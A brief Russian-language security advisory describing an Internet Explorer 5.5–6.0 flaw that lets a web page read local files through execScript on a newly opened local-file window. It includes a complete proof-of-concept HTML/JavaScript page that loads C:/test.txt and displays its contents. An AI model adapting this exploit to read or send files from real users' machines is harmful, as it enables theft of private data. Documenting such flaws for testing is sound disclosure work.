Уязвимость в IE позволяет читать и посылать местные файлы.
Проблема связанна с возможностью обратится к DOM локального файла, вызывая функцию execScript в созданном новом окне. Эксплоит, приведенный ниже, позволяет читать файлы через броузер, но также возможно прочитать любые другие двоичные файлы (прикрепляя событие к DOM, затем вызывая httpxmlcomponent). Для успешной эксплуатации требуется знать имя файла.

Уязвимость найдена в IE 5.5-6.0. 

Эксплоит
Для проверки уязвимости, создайте файл test.txt c любым текстом, а затем просмотрите следующую страницу:

<html>
<head>
<title>Example exploit</title>

<script language=»javascript»>

var extDoc

function doIt() {

extDoc = document.open(‘file:///C:/test.txt’,’jelmer’,’height=200,width=400,status=no, toolbar=no,menubar=no,location=no’);

cmd = ‘extDoc.execScript(«alert(document.body.innerText)», «Jscript»);’;
setTimeout(cmd,2000); 

}

</script>

</head>
<body onload=»doIt()»>
Wait to 2 seconds
</body>

</html>



Оставить мнение